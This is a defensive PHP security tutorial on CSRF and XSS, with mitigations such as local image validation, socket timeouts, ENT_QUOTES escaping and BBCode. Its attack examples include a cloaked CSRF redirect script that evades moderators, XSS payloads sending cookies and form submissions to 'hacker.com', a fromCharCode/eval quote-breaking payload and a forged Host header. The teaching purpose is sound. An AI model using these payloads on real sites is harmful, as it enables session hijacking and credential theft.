(Author: Ilia Alshanetsky) Of all the vulnerabilities affecting web applications, especially those written in PHP, Cross-Site Request Forgery (CSRF) and Cross-Site Scripting (XSS) are by far the most prevalent. In many instances, developers downplay the severity of these threats and fail to take preventative action.
In this article, we will show you how CSRF and XSS work and how to defend against them. To dispel the myths about these attacks, I will assume the role of a hacker and show how the supposedly harmless injection of tiny bits of HTML can perform amazing things, from stealing the user's identity to a completely transparent rewrite of site content.
To get the most from this article, you should know the basics of PHP, HTML and JavaScript.
Let's start with a brief overview of CSRF and XSS. The principle behind both vulnerabilities is that the hacker gains the ability to insert some arbitrary content into the page. This content can be used to do things that the author of the site did not intend, like stealing the hapless user's cookies.
The difference between CSRF and XSS is the way in which the attack is delivered. XSS relies on the injection of arbitrary data through non-validated input, such as fields from a POST form submission. On the other hand, CSRF depends on browser features to retrieve and execute the attack bundle.
Let's begin with a CSRF attack, simply because it takes the least effort to perform and many applications are vulnerable to it. Consider an application such as a bulletin board or a blog that lets users embed images in their messages via the <img> tag or its BBCode equivalent, the [img] tag. For those unfamiliar with BBCode, it is a set of formatting tags, very similar to HTML, but intended to provide only a limited subset of text formatting options.
Rather than supplying a genuine image, the attacker supplies a URL that points to a page on the site where a GET request executes an action, for example http://foobar.com/admin/delete_msg.php?id=1. When a user views the message, the browser tries to load the image and, in doing so, inadvertently executes a command that removes the message with an ID of 1. This will not work for every visitor, but we only need it to succeed once. The vulnerable users are those who are logged in at foobar.com and hold an authentication cookie, and who thus have the credentials needed to perform the action.
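A minimal sketch of how such a post becomes an attack, assuming a naive [img] handler like the hypothetical naive_bbcode_img() below (it is not taken from any real forum package). Note that it even escapes the URL with htmlspecialchars(); that does not help, because the URL is still a perfectly valid request for the browser to make on the logged-in user's behalf.

```php
<?php
// Hypothetical, deliberately naive [img] BBCode handler: it escapes the URL
// for HTML, but never asks what the URL actually points to.
function naive_bbcode_img(string $text): string
{
    return preg_replace_callback(
        '~\[img\](.+?)\[/img\]~i',
        function (array $m): string {
            return '<img src="' . htmlspecialchars($m[1], ENT_QUOTES) . '">';
        },
        $text
    ) ?? $text;
}

// The attacker "posts an image" that is really the admin delete action.
$post = 'Nice photo! [img]http://foobar.com/admin/delete_msg.php?id=1[/img]';
echo naive_bbcode_img($post), "\n";
// Nice photo! <img src="http://foobar.com/admin/delete_msg.php?id=1">
```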
To make matters worse, old versions of Internet Explorer and other browsers execute and render entire web pages hidden in images. If the URL points to an HTML file, the browser renders and executes that page, retrieving all of its components as well. This is particularly dangerous because the page can contain an extensive block of JavaScript, which can reach back into the original page via window.opener and modify its content.
This particular abuse was one of the earliest CSRF attacks, used by scammers trying to drive traffic to their sites by climbing to the top of various link aggregators. The scammers embedded image widgets on their pages that linked to the aggregator sites, so that each visitor effectively made a request to the aggregator on the scammer's behalf. This significantly inflated their "ping-back" statistics, getting them to the top of the list quickly. The scam is still out there, but it relies on linking directly to a URL that the tracker assigns to each site for the purpose of linking back to it. For example, foobar.com may have been assigned the URL http://tracker.com/?sid=1234, so the site's operator can simply embed this URL on various sites (including his own), making every user who loads those pages visit the tracker. In effect, foobar.com would appear to be sending a lot of traffic to tracker.com. Fortunately, because only that one URL is loaded, in most cases a simple check of the HTTP Referer header will reveal the scam.
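One way the tracker's Referer check might look, as a sketch: the hypothetical hit_counts() credits a hit only when the Referer host matches the host registered for that site ID (the $registered map is an assumption). It exposes copies of the tracker URL planted on unrelated sites, though it cannot tell an image embedded on foobar.com itself from a genuine click, and a hit with no Referer at all is simply not counted.

```php
<?php
// Hypothetical tracker-side check. $registered maps site ID => that site's host.
function hit_counts(?string $referer, string $sid, array $registered): bool
{
    if ($referer === null || $referer === '' || !isset($registered[$sid])) {
        return false; // no Referer, or unknown site: do not credit the hit
    }
    $host = parse_url($referer, PHP_URL_HOST);
    return is_string($host) && strcasecmp($host, $registered[$sid]) === 0;
}

$registered = ['1234' => 'foobar.com'];
// A visitor arriving from foobar.com itself
var_dump(hit_counts('http://foobar.com/page.php', '1234', $registered)); // bool(true)
// The same tracker URL embedded as an "image" on some other site
var_dump(hit_counts('http://elsewhere.example/blog', '1234', $registered)); // bool(false)
```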
Another attack is mostly an attempt to break the site's layout. The trickster could use an image that is small in file size but has large dimensions, ensuring that it takes up the entire screen and pushes all other content off the page. For example, a GIF image with massive dimensions of 2000 by 2000 pixels can weigh a mere 3786 bytes and is sure to take up all of the screen space, no matter how large your monitor is. This is not really a hack per se, though; it is more an annoyance than anything else.
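The gap between file size and on-screen size is easy to see, because a GIF declares its dimensions in the first few bytes of its header. The sketch below (gif_header() is a hypothetical helper) builds only those header bytes and asks getimagesizefromstring(), available since PHP 5.4, what it sees. It demonstrates the header format; it is not a complete, renderable image.

```php
<?php
// Build just the start of a GIF: the 6-byte signature, the logical screen
// width and height (16-bit little-endian), then three more header bytes.
function gif_header(int $width, int $height): string
{
    return 'GIF89a' . pack('vv', $width, $height) . "\x00\x00\x00";
}

$bytes = gif_header(2000, 2000);
$info  = getimagesizefromstring($bytes);

echo strlen($bytes), " bytes\n";    // 13 bytes
echo $info[0], 'x', $info[1], "\n"; // 2000x2000
```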
Now you may be thinking: "My application is smarter: rather than allowing arbitrary image links, it uses the PHP function getimagesize() (or equivalent) to validate each image to ensure it is really an image of acceptable size and dimensions."
Alas, this safety mechanism can be easily bypassed; let's take a moment to explore how. First, the attacker makes sure the basic extension checks pass by providing a URL that really does look like a link to an image, for example http://hacker.com/me.jpg. This ensures that validators looking for a proper image extension are not alerted. The next trick is to have mod_rewrite map me.jpg to a PHP script that decides what to send back, which gives the intruder maximum flexibility.
RewriteEngine on
RewriteRule ^/?me\.jpg$ hacker.php [L]
At this point, any request for me.jpg actually goes to the hacker.php script instead, and inside the script we can take a number of approaches to trick the validator. For example, if the attacker knows the IP address that the server's "check" request originates from, he can send that request a valid image while redirecting everyone else to the URL of his choice.
if ($_SERVER['REMOTE_ADDR'] === '1.2.3.4') {
    // The validating server gets a genuine image
    header("Content-Type: image/jpeg");
    readfile("./me.jpg");
} else {
    // Everyone else is bounced to the action URL
    header("Location: http://foobar.com/admin/delete_msg.php?id=1");
}
Another, more universal approach is to check for the presence of the HTTP_REFERER header, which most browsers send to indicate the page the user came from. When PHP makes a validation request via getimagesize(), or when the admin opens the link manually, this field is empty. We can therefore base our response on the presence of this header: if it exists, we perform the attack, and if it does not, we show a harmless image.
if (empty($_SERVER['HTTP_REFERER'])) {
    // No Referer: probably a validator or an admin, so show the real image
    header("Content-Type: image/jpeg");
    readfile("./me.jpg");
} else {
    // Loaded as an image on some page: redirect to the action URL
    header("Location: http://foobar.com/admin/delete_msg.php?id=1");
}
In some cases our content may need to go through a validation process, such as post approval on a blog or avatar approval on a forum. If we use the tricks shown so far, an admin or moderator may spot our attack and do something about it. To avoid detection, we can delay the attack by building a 1-2 day wait into our script, or simply wait until the content is approved before we start issuing the redirect. Another trick is to attack at random, so that not every user is affected. We also won't attack the same user twice, further reducing our chances of detection.
$deployment_time = filemtime(__FILE__);
// Serve the harmless image during the first two days, to users already
// attacked, and on roughly two out of three requests
if (time() < $deployment_time + 86400 * 2
    || isset($_COOKIE['h'])
    || rand(0, 2) !== 0) {
    header("Content-Type: image/jpeg");
    readfile("./me.jpg");
    exit;
}
// Mark this visitor so they are never attacked twice
setcookie("h", "1", time() + 86400 * 365, "/");
header("Location: http://foobar.com/admin/delete_msg.php?id=1");
In the new script there are three mechanisms in place to thwart detection. First, assuming each attack has its own script, we do not attempt to cause trouble for two days after deployment, which in most cases lets us get past the initial validation process if one exists. Then, a cookie is used to keep track of the user and ensure that we only attack the same person once. Finally, the attack is randomized, so the redirect is issued on only about one request in three.
So what can be done about this problem? There are two solutions. The first one involves disabling the ability for a user to supply any image links. While this seems to be the safest and simplest way out, for many developers it presents an unwelcome loss of functionality. The other alternative involves downloading each image locally, validating it with the getimagesize() function, then storing the file on the server and modifying the image link to reference the local file.
$img = "http://hacker.com/me.jpg";
$tmp = $img_store_dir . md5($img);
// Download once, so the content cannot change between validation and use
file_put_contents($tmp, file_get_contents($img));
$i = getimagesize($tmp);
if (!$i || $i[0] > $max_width || $i[1] > $max_height) {
    // Not an image, or too large: discard it
    unlink($tmp);
} else {
    // Add an extension matching the real image type (e.g. ".gif")
    rename($tmp, $tmp . image_type_to_extension($i[2]));
}
In the above example, the first action we perform is to download the image to a local file inside our image store directory, named after the md5 hash of the URL. Once the file is downloaded, we validate it via the getimagesize() function. The reason for downloading to a local file first is to ensure that the potential hacker has no chance to serve one thing to our validation request and something else to later requests: what we validate is exactly what we will serve.
The getimagesize() function returns an array giving us all sorts of information about the image, or false if the file is not a valid image. So our validation check tests that we have an image, and then makes sure its dimensions are within the allowed boundaries. If any of these checks fails, the offending file is removed. Otherwise, we rename the file, giving it an image extension based on its type to ensure that browsers can display it.
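A variation worth considering, offered as a sketch rather than the method above: validate the downloaded bytes in memory with getimagesizefromstring() (PHP 5.4 and later) and write them to the image store only if they pass, so a rejected file never touches the disk. The helper name accept_image() and the GIF/JPEG/PNG whitelist are assumptions for illustration.

```php
<?php
// Hypothetical helper: returns the name to store the image under, or null if
// the bytes are rejected. The whitelist of types is an illustrative choice.
function accept_image(string $url, string $bytes, int $maxWidth, int $maxHeight): ?string
{
    $info = getimagesizefromstring($bytes);
    if ($info === false) {
        return null; // not something getimagesize() recognizes as an image
    }
    [$width, $height, $type] = $info;
    $allowed = [IMAGETYPE_GIF, IMAGETYPE_JPEG, IMAGETYPE_PNG];
    if (!in_array($type, $allowed, true) || $width > $maxWidth || $height > $maxHeight) {
        return null; // wrong type or too large
    }
    // Same naming scheme as above: md5 of the URL plus the real type's extension
    return md5($url) . image_type_to_extension($type);
}

// Stand-in for downloaded data: a GIF header declaring 100x50
$bytes = 'GIF89a' . pack('vv', 100, 50) . "\x00\x00\x00";
echo accept_image('http://hacker.com/me.jpg', $bytes, 640, 480), "\n";
```

In use, the calling code would download once with file_get_contents($img), pass the URL and the bytes to accept_image(), and call file_put_contents($img_store_dir . $name, $bytes) only when a name comes back. The download itself is still exposed to the timeout problems discussed below.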
There are several other issues with this approach, though. The first is that storing all images locally can consume a great deal of disk space. Furthermore, serving every image sent by users from your own server may substantially increase its bandwidth usage, raising hosting costs. These two problems can be partly alleviated by setting a size restriction on the images, but that does not solve the problem altogether.
Perhaps the biggest issue is that having PHP download an external file is something an attacker can abuse to launch a Denial of Service (DoS) attack against the server. To download a file, PHP first needs to establish a connection to the remote host. If that host happens to be particularly slow, this can take a fair amount of time. During this time, the PHP process handling the request is waiting on a socket (which takes no CPU time, so the maximum execution time limit is not triggered). By default, this wait lasts a whopping 60 seconds, during which the process cannot serve anyone else. If every web server process can be made to perform such a download, the server becomes inaccessible to other users. Given that most servers allow fewer than 200 simultaneous connections, this is quite trivial to exploit. Fortunately, PHP provides a solution in the form of the default_socket_timeout INI setting, which can lower the connection timeout to a smaller, much safer value, like 2-5 seconds. This setting can be changed within the script itself and affects all connections established by PHP via the streams API:
ini_set("default_socket_timeout", 5);
The above command solves the connection problem, but it does not address slow downloading of the image itself. This is further exacerbated by the fact that PHP will wait indefinitely for the content to arrive from the remote server; there isn't even the nominal limit that applies to establishing the connection. Before you despair, there is a way to address this problem as well: setting a read/write timeout via the stream_set_timeout() function. However, it only works on a stream resource, so we need to modify our image-reading code:
$fp = fopen($img_url, "r");
if ($fp !== false) {
    // Give up on any single read that waits more than 1 second for data
    stream_set_timeout($fp, 1);
    $data = stream_get_contents($fp);
    $meta = stream_get_meta_data($fp);
    fclose($fp);
    // Keep the file only if the transfer finished without timing out
    if ($data !== false && !$meta['timed_out']) {
        file_put_contents($destination_path, $data);
    }
}
With the new code, we tell PHP to spend no more than a second waiting for data to arrive at the socket. An even smaller timeout can be set via the third argument of stream_set_timeout(), which takes a value in microseconds, so stream_set_timeout($fp, 0, 250000); would indicate a quarter-second timeout.
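Since the second and third arguments of stream_set_timeout() are whole seconds and microseconds, a fractional timeout has to be split in two. The hypothetical timeout_parts() helper below does that arithmetic; for 0.25 seconds it yields the same 0 and 250000 used above.

```php
<?php
// Hypothetical helper: split fractional seconds into the
// (seconds, microseconds) pair that stream_set_timeout() takes.
function timeout_parts(float $seconds): array
{
    $whole = (int) floor($seconds);
    $micro = (int) round(($seconds - $whole) * 1000000);
    if ($micro >= 1000000) { // rounding pushed us into the next whole second
        $whole++;
        $micro -= 1000000;
    }
    return [$whole, $micro];
}

[$sec, $usec] = timeout_parts(0.25);
echo "$sec, $usec\n"; // 0, 250000
// With a real stream: stream_set_timeout($fp, ...timeout_parts(0.25));
```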
But even with careful timeout setup, there is still room for abuse. The attacker simply needs to send data very slowly, say 5 bytes per second, just fast enough to avoid triggering our timeout. With just a 20 kilobyte image (20480 bytes), this would occupy the server for 4096 seconds, or about 68 minutes. This problem is next to impossible to solve. The solution would require reading the image in one-byte chunks while continually testing the transfer speed; if the connection turned out to be slower than the allowed minimum, the file would be rejected. This approach consumes far more processing resources, trading one problem for another.
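A sketch of a cheaper variation on the chunked idea, under its own assumptions: instead of measuring speed byte by byte, the hypothetical read_limited() reads modest chunks and rejects the download once it exceeds a size cap or an overall time budget. This bounds how long a slow sender can tie up the process (roughly the time budget plus one stream_set_timeout() interval), but the process is still occupied for that long, so it narrows the hole rather than closing it.

```php
<?php
/**
 * Read a stream in chunks; return null if the data grows past $maxBytes or
 * the whole transfer takes longer than $maxSeconds, however slowly it trickles.
 *
 * @param resource $fp an open, readable stream (ideally with stream_set_timeout() applied)
 */
function read_limited($fp, int $maxBytes, float $maxSeconds, int $chunk = 1024): ?string
{
    $deadline = microtime(true) + $maxSeconds;
    $data = '';
    while (!feof($fp)) {
        $piece = fread($fp, $chunk);
        if ($piece === false) {
            return null; // read error
        }
        $data .= $piece;
        if (strlen($data) > $maxBytes) {
            return null; // larger than we are willing to store
        }
        $meta = stream_get_meta_data($fp);
        if ($meta['timed_out'] || microtime(true) > $deadline) {
            return null; // one read stalled, or the whole transfer is too slow
        }
    }
    return $data;
}

// An in-memory stream standing in for the remote image
$fp = fopen('php://memory', 'r+');
fwrite($fp, str_repeat('x', 3000));
rewind($fp);
var_dump(strlen(read_limited($fp, 20480, 5.0) ?? '')); // int(3000)
fclose($fp);
```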
So what is the bottom line, as far as the images go? Well, short of removing the functionality and preventing their use altogether, all other solutions merely make attacks more difficult, but certainly not impossible.
While the image tag is the most frequent method of attack, CSRF can be mounted in a number of other ways that are, from some perspectives, far nastier and much harder to spot. One such attack uses the CSS background property, which specifies an image to be used as the background of a page element.
How can CSS be injected into the code? It is simpler than you might think, and quite common. The problem stems from the fact that many PHP applications try to give users some control over how their information is displayed, by allowing simple HTML formatting tags like bold and italics. In many cases, these tags are allowed via the optional second parameter of the strip_tags() function, which exempts certain supposedly harmless tags from removal. If developers want to let users of their application apply basic formatting, they simply tell the function not to remove those tags. For example, to allow bold and italics, I would call the function like this:
strip_tags($text, "<b><i>");
Seems pretty simple and safe, right?
Alas, this is not the case. When strip_tags() makes an allowance for a tag, it allows the tag in its entirety, including any attributes it may have. This means that while the attacker cannot inject other tags, he can pack attributes into the allowed ones. It is tempting to assume that simple presentational tags such as b and i cannot carry background styling, but HTML permits a style attribute on them, and browsers apply it. So, to repeat the tricks we performed with the image tag, we simply need a style attribute, as in the following example:
$text = '<b style="background: url(\'http://hacker.com/me.jpg\')">TEST</b>';
While a broken image will show up in the browser as an icon or similar indication, a missing or broken background is completely transparent and thus much more difficult to detect.
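The behavior is easy to confirm. In this sketch, strip_tags() removes the disallowed <script> tags but passes the allowed <b> tag through verbatim, style attribute and all.

```php
<?php
// The allow-list keeps <b> and <i>, but keeps them exactly as written.
$text = '<b style="background: url(\'http://hacker.com/me.jpg\')">TEST</b>'
      . '<script>alert(1)</script>';

$out = strip_tags($text, '<b><i>');
echo $out, "\n";
// The <script> tags are stripped, but the <b> tag, style attribute and
// background URL included, comes through untouched.
```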
Hopefully, this example illustrates why the tag allowance feature of strip_tags() should not be used. Instead, consider implementing a small subset of BBCode, which does not support attributes. A BBCode parser converts the tags into equivalent HTML, giving users the ability to format text without opening up attribute vulnerabilities. You don't have to write a parser on your own, as there are ready-to-use tools. For example, the PEAR class HTML_BBCodeParser would serve the purpose well; it can be downloaded from http://pear.php.net/package/HTML_BBCodeParser. An alternative to BBCode is the SafeHTML PHP package, available from http://pixel-apes.com/safehtml, which removes all unsafe HTML elements and attributes from the given text.
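To show why a BBCode subset avoids the attribute problem, here is a minimal sketch of the idea; tiny_bbcode() is hypothetical and is not the API of HTML_BBCodeParser or SafeHTML. It escapes all input first and only then turns matched [b] and [i] pairs into bare tags, so users have no way to supply attributes at all.

```php
<?php
// Hypothetical minimal BBCode subset: [b] and [i] only, with no attributes.
function tiny_bbcode(string $text): string
{
    // Escape everything first, so any HTML the user typed becomes inert text.
    $html = htmlspecialchars($text, ENT_QUOTES, 'UTF-8');
    // Then convert only matched pairs, so an unclosed [b] cannot run on
    // into the rest of the page.
    foreach (['b', 'i'] as $tag) {
        $html = preg_replace("~\\[$tag\\](.*?)\\[/$tag\\]~s", "<$tag>\$1</$tag>", $html) ?? $html;
    }
    return $html;
}

echo tiny_bbcode('[b]bold[/b] and <b style="x">sneaky</b>'), "\n";
// <b>bold</b> and &lt;b style=&quot;x&quot;&gt;sneaky&lt;/b&gt;
```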
Aside from background tricks and image tags, almost any tag that triggers the automatic download of a linked resource can be a point of CSRF attack. Tags like iframe and script are generally not accessible to the user; however, if they can be modified through an unverified variable, they pose a threat equal to that of the mechanisms explained above.
While CSRF is based on abusing existing or allowed page elements, Cross-Site Scripting (XSS) is an attempt to bypass input validation and give the attacker the means to inject content into the page. This content can be used to trick the user into disclosing sensitive information, to execute actions with the user's existing credentials, and so on. Even a CSRF attack can be mounted through an initial XSS hole, so in some ways XSS is an exploit with nearly limitless possibilities. Unfortunately, XSS is also extremely common, arguably the biggest bane of web applications, affecting both large and small sites.
In most cases an XSS opportunity is not even very well hidden. Often it is featured on the front page of the website, in the form of a search box. When the user submits a search term, the initial query is displayed on the result page, usually as the value of the <input> tag to allow easy modification of the entry. The lack of validation is what gives the intruder the means and opportunity to execute an XSS attack. To trigger the exploit, the attacker simply needs to specify "> XSS STRING <", where the XSS STRING is some arbitrary content to be injected into the page. The initial "> is intended to terminate the <input> tag (where the query is placed), and the ending <" handles the closure of the remaining portion of the tag.
<input type="text" name="q" value="<?php echo $_POST['q']; ?>" />
<!-- compromised output -->
<input type="text" name="q" value=""> XSS STRING <"" />
With this content in place, the attacker can now choose to modify the content of the page in any number of ways. For example, if I wanted to acquire the user's cookie for my own nefarious purpose, I would simply replace XSS STRING with the code below.
<script>
var r = new XMLHttpRequest();
r.open('get', 'http://hacker.com/?' + document.cookie);
r.send(null);
</script>
This small piece of JavaScript makes an HTTP request to a site of the hacker's choice, sending the names and values of all the cookies currently set for the victim. The intruder can now duplicate those cookies and gain the same access credentials as the compromised user. Older versions of Internet Explorer lack the native XMLHttpRequest object, but fortunately for the hacker, they offer an equivalent, new ActiveXObject("Microsoft.XMLHTTP"), that works the same way. This makes the hack universal.
Another trick is particularly well suited for pages that collect information from the user through a series of forms. Examples include a login page or a financial information request form on some e-commerce site. In this case, the attack string can be used to modify the action of the forms, making them send the data to an alternate site.
<script>
for (var i = 0; i < document.forms.length; i++)
    document.forms[i].action = 'http://hacker.com/x.php?' + document.forms[i].action;
</script>
The script above goes through all of the forms found on a given page and modifies their action fields according to the intruder's wishes. When a user submits information, it never reaches the intended page, going to the hacker instead. A particularly inventive attacker will take the time not only to capture the submitted information, but also to hide the evidence of the attack by passing the user's information on to the intended destination through a temporary redirect:
log_data($_GET, $_POST); // the attacker's own logging routine
// 307 tells the browser to repeat the same POST against the new location
header("HTTP/1.1 307 Temporary Redirect");
header("Location: " . $_SERVER['QUERY_STRING']);
When redirecting a POST request, the browser should confirm the action with the user. However, the message is not particularly clear and many users will simply click through. Even if they do not, the damage has already been done. Because all the operations are done through redirects, the HTTP_REFERER header is never updated, so the site also does not have any evidence of the attack in real-time. The only evidence of this can perhaps be found inside the access logs, where the initial request with the attack string is located.
In some situations, the application developer has implemented some basic, but incomplete, safeguards. For example, it is not uncommon for the <, " and > characters needed for tag injection to be encoded into &lt;, &quot; and &gt; respectively, while single quotes (') are left untouched. This is the result of the default behavior of PHP's htmlspecialchars() and htmlentities() functions (before PHP 8.1, whose defaults now include ENT_QUOTES), which encode special characters into equivalent HTML entities. The problem with leaving single quotes unencoded is that some HTML uses single quotes to enclose attribute values. This means that the attacker can prematurely terminate an existing attribute and inject some of his own.
For example, we could use the onMouseOver attribute to trigger a JavaScript event as soon as the mouse is moved over the compromised page element. Then, we must avoid all of the encoded characters and the single quote, as it is now acting as an attribute enclosure. While this may sound complex, it is actually quite trivial to perform, thanks to two JavaScript functions: String.fromCharCode() (which can be used to convert a list of ASCII codes into the characters they represent) and eval() (which will execute the given string). To implement a popup JavaScript alert exclaiming XSS, a hacker would simply inject the following string:
'onMouseOver='eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,39,41,59))' '
The initial single quotation mark terminates the open attribute, and the final one opens a new quoted value that the page's own closing quote will terminate, preventing an HTML parsing error. The content in the middle is our new attribute, containing JavaScript whose ASCII codes translate into alert('XSS'); and are promptly executed by eval().
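Where do the numbers come from? Each one is simply the character code of one character of the JavaScript being smuggled in. This short sketch (char_codes() is a hypothetical name) reproduces the list from the payload; ord() returns byte values, which match ASCII codes for ASCII input like this.

```php
<?php
// Turn a JavaScript snippet into the comma-separated list of character codes
// that String.fromCharCode() expects.
function char_codes(string $js): string
{
    return implode(',', array_map('ord', str_split($js)));
}

echo char_codes("alert('XSS');"), "\n";
// 97,108,101,114,116,40,39,88,83,83,39,41,59
```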
To avoid these kinds of problems, it is important to always pass ENT_QUOTES as the second parameter to the htmlspecialchars() and htmlentities() functions. This triggers the encoding of single quotes into the corresponding HTML entity, &#039;.
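The difference between the two flag settings can be seen directly on a payload of the same shape as the one above (with alert(1) standing in for the encoded call). Passing the flags explicitly is the safe habit, because the default has changed over time: before PHP 8.1 it was based on ENT_COMPAT, which leaves single quotes alone.

```php
<?php
$payload = "'onMouseOver='alert(1)' '";

// ENT_COMPAT: double quotes are encoded, single quotes are left alone.
echo htmlspecialchars($payload, ENT_COMPAT), "\n";
// 'onMouseOver='alert(1)' '

// ENT_QUOTES: single quotes become &#039; too, so the attribute cannot be closed.
echo htmlspecialchars($payload, ENT_QUOTES), "\n";
// &#039;onMouseOver=&#039;alert(1)&#039; &#039;
```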
A related validation mistake is to rely solely on the strip_tags() function for the purposes of securing user input. While the function is extremely effective at removing HTML tags, it does nothing about the single or double quotes. A proper approach would be to perform strip_tags() first, then follow it up with either htmlspecialchars() or htmlentities():
$text = htmlspecialchars(strip_tags($_POST['msg']), ENT_QUOTES);
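Applied to the search box from the earlier XSS example, the combination might look like the sketch below. render_search_box() is a hypothetical helper, the field is named q to match $_POST['q'], and the UTF-8 charset argument is an assumption about the page's encoding.

```php
<?php
// Hypothetical helper: strip tags, then encode <, >, & and both kinds of
// quotes before placing the value inside a double-quoted attribute.
function render_search_box(string $q): string
{
    $safe = htmlspecialchars(strip_tags($q), ENT_QUOTES, 'UTF-8');
    return '<input type="text" name="q" value="' . $safe . '" />';
}

echo render_search_box('"> XSS STRING <"'), "\n";
echo render_search_box("'onMouseOver='alert(1)' '"), "\n";
// <input type="text" name="q" value="&#039;onMouseOver=&#039;alert(1)&#039; &#039;" />
```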
It is imperative to validate all input, no matter the source. A common mistake is to filter only the data coming through GET, POST and cookies, while forgetting to validate data received through the web server environment variables in the $_SERVER superglobal. Although this data is provided by the web server, it is often based on user-supplied content, making it just as dangerous as data coming directly from the user. These values often appear in control panels when an error occurs, which makes them particularly dangerous: the user who sees the modified content will often have elevated access privileges (such as an administrator).
One such attack involves the HTTP_HOST value, which holds the domain name currently being accessed. Many think of it as a safe value; after all, how can the attacker change the domain? In fact, the value comes from the Host: header supplied by the client making the request. If the site being accessed runs on a dedicated IP address, or is the primary (first) virtual host on a shared IP, a request with a bogus value for this header will still be served by an Apache web server. A request for a page on such a site can therefore be forged, allowing arbitrary data to be injected into HTTP_HOST:
GET / HTTP/1.0
Host: <script>...
The result is that $_SERVER['HTTP_HOST'] now equals "<script>..." or potentially a far more dangerous payload. The same logic can be applied to other headers like Via (HTTP_VIA) and X-Forwarded-For (HTTP_X_FORWARDED_FOR), which are normally used by proxies to indicate the address of the user behind the proxy. Perhaps the only truly safe field is REMOTE_ADDR, the user's IP address. This is resolved by the web server and will always contain a valid IP. All other fields should be meticulously validated prior to usage.
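As a sketch of what "meticulously validated" could mean for two of these values (both helpers are hypothetical, and the host list is an assumption): accept HTTP_HOST only if it is one of the names the site actually serves, and keep only syntactically valid addresses from an X-Forwarded-For style header using filter_var() with FILTER_VALIDATE_IP. Format checks do not make such headers trustworthy; a perfectly valid-looking IP in X-Forwarded-For can still be forged.

```php
<?php
// Hypothetical: accept HTTP_HOST only if it is a host name this site serves.
function safe_host(?string $host, array $allowed, string $default): string
{
    if ($host !== null) {
        $host = strtolower($host);
        if (in_array($host, $allowed, true)) {
            return $host;
        }
    }
    return $default; // anything unexpected, markup included, is replaced
}

// Hypothetical: keep only the entries of a comma-separated header that are
// syntactically valid IPv4/IPv6 addresses.
function forwarded_ips(?string $header): array
{
    $ips = [];
    foreach (explode(',', (string) $header) as $part) {
        $ip = filter_var(trim($part), FILTER_VALIDATE_IP);
        if ($ip !== false) {
            $ips[] = $ip;
        }
    }
    return $ips;
}

$allowed = ['foobar.com', 'www.foobar.com'];
echo safe_host($_SERVER['HTTP_HOST'] ?? null, $allowed, 'foobar.com'), "\n";
print_r(forwarded_ips($_SERVER['HTTP_X_FORWARDED_FOR'] ?? null));
```

A Host header may also carry a port (foobar.com:8080), which this sketch rejects unless that exact value is listed in $allowed.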
Hopefully, this brief overview of XSS and CSRF was an eye-opener, showing the dangers posed by these exploits and highlighting the need for taking steps to prevent them. We have shown you how simple it is to deploy mechanisms against those attacks. Now the security of your server lies in your hands: if you apply those principles while writing your code, you will be able to diminish the risk of unauthorized access and prevent potential losses.